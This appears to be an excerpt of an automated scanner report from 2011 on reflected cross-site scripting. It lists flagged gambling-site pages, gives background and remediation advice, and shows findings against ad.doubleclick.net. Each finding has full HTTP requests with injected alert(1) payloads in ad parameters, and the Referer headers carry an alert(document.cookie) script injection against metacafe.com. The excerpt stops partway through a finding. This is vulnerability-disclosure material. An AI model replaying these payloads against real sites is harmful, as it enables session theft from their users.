http://www.scratch2cash.com/Sitemap.aspx [BO cookie]
http://www.scratch2cash.com/Sitemap.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/Terms.aspx [BO cookie]
http://www.scratch2cash.com/Terms.aspx [RegistrationMode cookie]
http://www.scratch2cash.com/UnderAge.aspx [BO cookie]
http://www.scratch2cash.com/UnderAge.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/AboutUs.aspx [BO cookie]
http://www.scratchcardheaven.com/AboutUs.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/ContactUsMail.aspx [BO cookie]
http://www.scratchcardheaven.com/ContactUsMail.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/FairPlay.aspx [BO cookie]
http://www.scratchcardheaven.com/FairPlay.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/Help.aspx [BO cookie]
http://www.scratchcardheaven.com/Help.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/Home.aspx [BO cookie]
http://www.scratchcardheaven.com/Home.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/InviteFriend.aspx [BO cookie]
http://www.scratchcardheaven.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/PlayersClub.aspx [BO cookie]
http://www.scratchcardheaven.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/Promotions.aspx [BO cookie]
http://www.scratchcardheaven.com/Promotions.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/Responsible.aspx [BO cookie]
http://www.scratchcardheaven.com/Responsible.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [BO cookie]
http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/Terms.aspx [BO cookie]
http://www.scratchcardheaven.com/Terms.aspx [RegistrationMode cookie]
http://www.scratchcardheaven.com/UnderAge.aspx [BO cookie]
http://www.scratchcardheaven.com/UnderAge.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/ [BO cookie]
http://www.svenskalotter.com/ [RegistrationMode cookie]
http://www.svenskalotter.com/AboutUs.aspx [BO cookie]
http://www.svenskalotter.com/AboutUs.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/Affiliates.aspx [BO cookie]
http://www.svenskalotter.com/Affiliates.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/Charity.aspx [BO cookie]
http://www.svenskalotter.com/Charity.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/ContactUsMail.aspx [BO cookie]
http://www.svenskalotter.com/ContactUsMail.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/FairPlay.aspx [BO cookie]
http://www.svenskalotter.com/FairPlay.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/Help.aspx [BO cookie]
http://www.svenskalotter.com/Help.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/InviteFriend.aspx [BO cookie]
http://www.svenskalotter.com/InviteFriend.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/PlayersClub.aspx [BO cookie]
http://www.svenskalotter.com/PlayersClub.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/Promotions.aspx [BO cookie]
http://www.svenskalotter.com/Promotions.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/Responsible.aspx [BO cookie]
http://www.svenskalotter.com/Responsible.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/SecurityAndPrivacy.aspx [BO cookie]
http://www.svenskalotter.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/Terms.aspx [BO cookie]
http://www.svenskalotter.com/Terms.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/UnderAge.aspx [BO cookie]
http://www.svenskalotter.com/UnderAge.aspx [RegistrationMode cookie]
http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [BO cookie]
http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [RegistrationMode cookie]
http://www.winnings.com/how-to-win-money [winnings[sessionId] cookie]
http://www.winnings.com/how-to-win-money [winnings[vid] cookie]
http://www.winnings.com/instant-games [winnings[sessionId] cookie]
http://www.winnings.com/instant-games [winnings[sessionId] cookie]
http://www.winnings.com/instant-games [winnings[vid] cookie]
http://www.winnings.com/lottery-scratch-cards [winnings[sessionId] cookie]
http://www.winnings.com/lottery-scratch-cards [winnings[vid] cookie]
http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]
http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]
http://www.winnings.com/scratch-cards [winnings[vid] cookie]
http://www.winnings.com/site-map [winnings[vid] cookie]
http://www.winnings.com/slots [winnings[sessionId] cookie]
http://www.winnings.com/slots [winnings[sessionId] cookie]
http://www.winnings.com/slots [winnings[vid] cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecffa'-alert(1)-'64e16de441d was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441d HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:06 GMT
Expires: Mon, 16 May 2011 12:53:06 GMT

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441dhttp://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/\">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce96a"-alert(1)-"177f32f4f53 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:02 GMT
Expires: Mon, 16 May 2011 12:53:02 GMT

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53http://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmode = "opaque";

var bg =
...[SNIP]...

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ec69"-alert(1)-"ecd7fe965c6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0b8'-alert(1)-'f42e8ff9e63 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87af'-alert(1)-'92dc5cf3e85 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28566"-alert(1)-"c54abcfeda6 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmo
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fcbe"-alert(1)-"fd139792dbe was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('\n\n\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74214'-alert(1)-'6b515b85808 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

